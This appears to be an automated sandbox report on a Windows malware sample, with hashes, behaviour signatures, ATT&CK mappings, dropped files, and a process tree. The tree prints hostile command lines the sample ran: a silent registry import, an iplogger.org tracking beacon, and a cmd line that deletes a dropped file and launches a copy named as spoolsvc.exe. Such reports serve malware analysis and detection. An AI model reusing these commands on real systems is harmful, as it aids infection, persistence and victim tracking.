Overview

overview

10

Static

static

fed55c7266...6a.exe

windows7_x64

10

fed55c7266...6a.exe

windows10_x64

10

Analysis

  • max time kernel
    140s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-11-2020 19:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fed55c7266cf091330b67ef4a5d8756a.exe

  • Size

    504KB

  • MD5

    fed55c7266cf091330b67ef4a5d8756a

  • SHA1

    96f2724c024afae6a85dd67c4dd32adf240dffd5

  • SHA256

    9d50a832749b89ed5ac52dd84acf0ae6cd16196267401d1ad1cbfc8506f92bba

  • SHA512

    caad5eb4613e8316b15959f08dc6dde57d220584ad72c964bc3a7179d83ada061e3fd434e11f0b7d898ade461ef665f63c8ead4164f588927b3b9a338decdb04

Score
10/10
discoverypersistence

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ServiceHost packer 14 IoCs

    Detects ServiceHost packer used for .NET malware

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 11 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Program crash 1 IoCs
  • NSIS installer 3 IoCs
    installer
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fed55c7266cf091330b67ef4a5d8756a.exe
    "C:\Users\Admin\AppData\Local\Temp\fed55c7266cf091330b67ef4a5d8756a.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe
      "C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks processor information in registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\SysWOW64\cmd.exe
        "cmd" /c start tmp1.exe & start tmp2.exe
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1328
        • C:\Users\Admin\AppData\Local\Temp\tmp1.exe
          tmp1.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1880
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 1276
            5⤵
            • Loads dropped DLL
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2304
        • C:\Users\Admin\AppData\Local\Temp\tmp2.exe
          tmp2.exe
          4⤵
          • Executes dropped EXE
          PID:1700
    • C:\Windows\SysWOW64\regedit.exe
      "C:\Windows\System32\regedit.exe" \s C:\Windows\wotsuper.reg
      2⤵
      • Runs .reg file with regedit
      PID:884
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1lBhp.html
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2000
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2000 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1952
  • C:\Windows\system32\efsui.exe
    efsui.exe /efs /keybackup
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2068
  • C:\Windows\system32\cmd.exe
    cmd /c choice /C Y /N /D Y /T 3 & del "C:\Users\Admin\AppData\Local\Temp\tmp2.exe" & C:\Users\Admin\AppData\Local\Microsoft\spoolsvc.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2100
    • C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      2⤵
        PID:2132
      • C:\Users\Admin\AppData\Local\Microsoft\spoolsvc.exe
        C:\Users\Admin\AppData\Local\Microsoft\spoolsvc.exe
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:2184

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Privilege Escalation

    Defense Evasion

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Web Service

    1
    T1102

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe
      MD5

      1097a83890f4f6ba87762a98166e8091

      SHA1

      82630ccff8a0054117bd555943a77d415b866174

      SHA256

      eb6bf79c7b82421439fbe0884fde1b963a56d424f1a642e7db9e56e2792a4fc8

      SHA512

      5ba5f76b9a08b3c523052c464187410e955a49681847c1de792590095fd190137a5f7952ec4c57d67e28fca8a17ef5ebf5bfab26ebc77beaefc0749f41b2f9d1

      Download Submit
    • C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe
      MD5

      1097a83890f4f6ba87762a98166e8091

      SHA1

      82630ccff8a0054117bd555943a77d415b866174

      SHA256

      eb6bf79c7b82421439fbe0884fde1b963a56d424f1a642e7db9e56e2792a4fc8

      SHA512

      5ba5f76b9a08b3c523052c464187410e955a49681847c1de792590095fd190137a5f7952ec4c57d67e28fca8a17ef5ebf5bfab26ebc77beaefc0749f41b2f9d1

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      54e7819a613c7bcdec3a66c867d4f1da

      SHA1

      8dbe6b6354017714de94600a5b03bea029c5f7fb

      SHA256

      99ef550a206b6c1f169bfbc2b87bc689503161821c03490480bfbe023a9af692

      SHA512

      d93021db162ac73b46d25c6e5afba9b6821a2d39e0ab577eccc7c418d18592e96a6291e5496c92cce5b74250500afba34dfca301280db39ac02d8d098154cde1

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w5ukms8\imagestore.dat
      MD5

      7e9940fdba7ec39fe8daf730e5e8d85a

      SHA1

      c5e25d613669a56a5400fc7a41b4891bbd2f33bb

      SHA256

      b3b56c78c748c66e626a19ce97454770fafa123ad104355bb97f802688a51c40

      SHA512

      b49aef1d0b278c380228244e9204b8368c936d24d57cd65d6e2f45b4bc196aef88a7b27ca2096ddae8e562a4f09acb90b7f5a1d0280aa1e5265998f559688374

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\spoolsvc.exe
      MD5

      e76739b49a4f804989d54946bc7da936

      SHA1

      67f4113a3af2561ef011cffc33146dc7cb48514d

      SHA256

      783122da15a5aaa2c6bda3b76ed0ce77d988150698b65ac0a460e207f6e623bf

      SHA512

      7ede05cb06ccf69e91d695127ef3fe2be8ccaf5f533355236caa7bd8c9f26178acf9f9fdfe8a0622ee7326341eb74b26256b2b3daf1c0c1a66135e2b8b26ce29

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp1.exe
      MD5

      ed78b5b2e535267593966c8d20a9fadc

      SHA1

      4d88a99d92ec6192d1279b4e6f5d52b640b72e3c

      SHA256

      ce6e57d77a6a5bab02eb37d771a2b225fc8b0ad24e8382ae111f277788a528e6

      SHA512

      603bcf69dbbde6728afc50eaa43584ef4fe39f20c5b3b4f79ea9b13801b64f94855118e89ccc46dbdf50ec289d4861f3fb8921a9464188cdbb76402727b3ba4f

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp1.exe
      MD5

      ed78b5b2e535267593966c8d20a9fadc

      SHA1

      4d88a99d92ec6192d1279b4e6f5d52b640b72e3c

      SHA256

      ce6e57d77a6a5bab02eb37d771a2b225fc8b0ad24e8382ae111f277788a528e6

      SHA512

      603bcf69dbbde6728afc50eaa43584ef4fe39f20c5b3b4f79ea9b13801b64f94855118e89ccc46dbdf50ec289d4861f3fb8921a9464188cdbb76402727b3ba4f

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp2.exe
      MD5

      e76739b49a4f804989d54946bc7da936

      SHA1

      67f4113a3af2561ef011cffc33146dc7cb48514d

      SHA256

      783122da15a5aaa2c6bda3b76ed0ce77d988150698b65ac0a460e207f6e623bf

      SHA512

      7ede05cb06ccf69e91d695127ef3fe2be8ccaf5f533355236caa7bd8c9f26178acf9f9fdfe8a0622ee7326341eb74b26256b2b3daf1c0c1a66135e2b8b26ce29

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp2.exe
      MD5

      e76739b49a4f804989d54946bc7da936

      SHA1

      67f4113a3af2561ef011cffc33146dc7cb48514d

      SHA256

      783122da15a5aaa2c6bda3b76ed0ce77d988150698b65ac0a460e207f6e623bf

      SHA512

      7ede05cb06ccf69e91d695127ef3fe2be8ccaf5f533355236caa7bd8c9f26178acf9f9fdfe8a0622ee7326341eb74b26256b2b3daf1c0c1a66135e2b8b26ce29

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4HNDTHPZ.txt
      MD5

      9adda8bc47b01f5e6637b4401824bbbf

      SHA1

      29dbd7b754a1730cb3cf88aa28e9ceb923613e37

      SHA256

      44da55c3cef7dd0ab4b8a2b0aaac1af216d9fe9a53000120e027d1e27ebf2595

      SHA512

      254b4d5d85d6dae2c2214c0b52805e0ab1a819a38a21a82e32afc3eec98ca1744afb5db7de2aa80c834b3a5ae8f2801e6c13781a64bc32b2733144a38719ff99

      Download Submit
    • \Program Files (x86)\wotsuper\wotsuper\wotsuper.exe
      MD5

      1097a83890f4f6ba87762a98166e8091

      SHA1

      82630ccff8a0054117bd555943a77d415b866174

      SHA256

      eb6bf79c7b82421439fbe0884fde1b963a56d424f1a642e7db9e56e2792a4fc8

      SHA512

      5ba5f76b9a08b3c523052c464187410e955a49681847c1de792590095fd190137a5f7952ec4c57d67e28fca8a17ef5ebf5bfab26ebc77beaefc0749f41b2f9d1

      Download Submit
    • \Users\Admin\AppData\Local\Temp\nss2C01.tmp\IRq.dll
      MD5

      293165db1e46070410b4209519e67494

      SHA1

      777b96a4f74b6c34d43a4e7c7e656757d1c97f01

      SHA256

      49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

      SHA512

      97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

      Download Submit
    • \Users\Admin\AppData\Local\Temp\nss2C01.tmp\JBH.dll
      MD5

      44e5c77cae3ae434d1e4e619bdb1c39b

      SHA1

      9988f020eac45207d148668227b6819a38bdafa0

      SHA256

      326c406116026019a41c94b2e6b4c1061154f3bc9a395638063dae349f8a7579

      SHA512

      c3e40499d1296bebd2b1a770d9cd1f025859963a0f6dff002eb336f069f057ac4b3d2f5819232af6d2802ba1a3770f62440136030eb37355fa6f5b6ee0bc0470

      Download Submit
    • \Users\Admin\AppData\Local\Temp\nss2C01.tmp\System.dll
      MD5

      0063d48afe5a0cdc02833145667b6641

      SHA1

      e7eb614805d183ecb1127c62decb1a6be1b4f7a8

      SHA256

      ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7

      SHA512

      71cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0

      Download Submit
    • \Users\Admin\AppData\Local\Temp\tmp1.exe
      MD5

      ed78b5b2e535267593966c8d20a9fadc

      SHA1

      4d88a99d92ec6192d1279b4e6f5d52b640b72e3c

      SHA256

      ce6e57d77a6a5bab02eb37d771a2b225fc8b0ad24e8382ae111f277788a528e6

      SHA512

      603bcf69dbbde6728afc50eaa43584ef4fe39f20c5b3b4f79ea9b13801b64f94855118e89ccc46dbdf50ec289d4861f3fb8921a9464188cdbb76402727b3ba4f

      Download Submit
    • \Users\Admin\AppData\Local\Temp\tmp1.exe
      MD5

      ed78b5b2e535267593966c8d20a9fadc

      SHA1

      4d88a99d92ec6192d1279b4e6f5d52b640b72e3c

      SHA256

      ce6e57d77a6a5bab02eb37d771a2b225fc8b0ad24e8382ae111f277788a528e6

      SHA512

      603bcf69dbbde6728afc50eaa43584ef4fe39f20c5b3b4f79ea9b13801b64f94855118e89ccc46dbdf50ec289d4861f3fb8921a9464188cdbb76402727b3ba4f

      Download Submit
    • \Users\Admin\AppData\Local\Temp\tmp1.exe
      MD5

      ed78b5b2e535267593966c8d20a9fadc

      SHA1

      4d88a99d92ec6192d1279b4e6f5d52b640b72e3c

      SHA256

      ce6e57d77a6a5bab02eb37d771a2b225fc8b0ad24e8382ae111f277788a528e6

      SHA512

      603bcf69dbbde6728afc50eaa43584ef4fe39f20c5b3b4f79ea9b13801b64f94855118e89ccc46dbdf50ec289d4861f3fb8921a9464188cdbb76402727b3ba4f

      Download Submit
    • \Users\Admin\AppData\Local\Temp\tmp1.exe
      MD5

      ed78b5b2e535267593966c8d20a9fadc

      SHA1

      4d88a99d92ec6192d1279b4e6f5d52b640b72e3c

      SHA256

      ce6e57d77a6a5bab02eb37d771a2b225fc8b0ad24e8382ae111f277788a528e6

      SHA512

      603bcf69dbbde6728afc50eaa43584ef4fe39f20c5b3b4f79ea9b13801b64f94855118e89ccc46dbdf50ec289d4861f3fb8921a9464188cdbb76402727b3ba4f

      Download Submit
    • \Users\Admin\AppData\Local\Temp\tmp1.exe
      MD5

      ed78b5b2e535267593966c8d20a9fadc

      SHA1

      4d88a99d92ec6192d1279b4e6f5d52b640b72e3c

      SHA256

      ce6e57d77a6a5bab02eb37d771a2b225fc8b0ad24e8382ae111f277788a528e6

      SHA512

      603bcf69dbbde6728afc50eaa43584ef4fe39f20c5b3b4f79ea9b13801b64f94855118e89ccc46dbdf50ec289d4861f3fb8921a9464188cdbb76402727b3ba4f

      Download Submit
    • \Users\Admin\AppData\Local\Temp\tmp1.exe
      MD5

      ed78b5b2e535267593966c8d20a9fadc

      SHA1

      4d88a99d92ec6192d1279b4e6f5d52b640b72e3c

      SHA256

      ce6e57d77a6a5bab02eb37d771a2b225fc8b0ad24e8382ae111f277788a528e6

      SHA512

      603bcf69dbbde6728afc50eaa43584ef4fe39f20c5b3b4f79ea9b13801b64f94855118e89ccc46dbdf50ec289d4861f3fb8921a9464188cdbb76402727b3ba4f

      Download Submit
    • \Users\Admin\AppData\Local\Temp\tmp2.exe
      MD5

      e76739b49a4f804989d54946bc7da936

      SHA1

      67f4113a3af2561ef011cffc33146dc7cb48514d

      SHA256

      783122da15a5aaa2c6bda3b76ed0ce77d988150698b65ac0a460e207f6e623bf

      SHA512

      7ede05cb06ccf69e91d695127ef3fe2be8ccaf5f533355236caa7bd8c9f26178acf9f9fdfe8a0622ee7326341eb74b26256b2b3daf1c0c1a66135e2b8b26ce29

      Download Submit
    • memory/884-5-0x0000000000000000-mapping.dmp
      Download
    • memory/1328-8-0x0000000000000000-mapping.dmp
      Download
    • memory/1616-22-0x000007FEF7B10000-0x000007FEF7D8A000-memory.dmp
      Filesize

      2.5MB

      Download
    • memory/1700-18-0x0000000000000000-mapping.dmp
      Download
    • memory/1700-25-0x0000000000F90000-0x0000000000F91000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1700-21-0x0000000073780000-0x0000000073E6E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/1700-17-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-49-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-45-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-12-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-51-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-55-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-54-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-53-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-24-0x00000000011D0000-0x00000000011D1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1880-20-0x0000000073780000-0x0000000073E6E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/1880-52-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-42-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-44-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-43-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-50-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-47-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-46-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-13-0x0000000000000000-mapping.dmp
      Download
    • memory/1880-48-0x0000000000000000-mapping.dmp
      Download
    • memory/1952-23-0x0000000000000000-mapping.dmp
      Download
    • memory/2000-9-0x0000000000000000-mapping.dmp
      Download
    • memory/2044-1-0x0000000000000000-mapping.dmp
      Download
    • memory/2132-28-0x0000000000000000-mapping.dmp
      Download
    • memory/2184-31-0x0000000000000000-mapping.dmp
      Download
    • memory/2184-34-0x0000000000990000-0x0000000000991000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2184-33-0x0000000073780000-0x0000000073E6E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/2304-37-0x0000000001E60000-0x0000000001E71000-memory.dmp
      Filesize

      68KB

      Download
    • memory/2304-36-0x0000000000000000-mapping.dmp
      Download
    • memory/2304-56-0x0000000002690000-0x00000000026A1000-memory.dmp
      Filesize

      68KB

      Download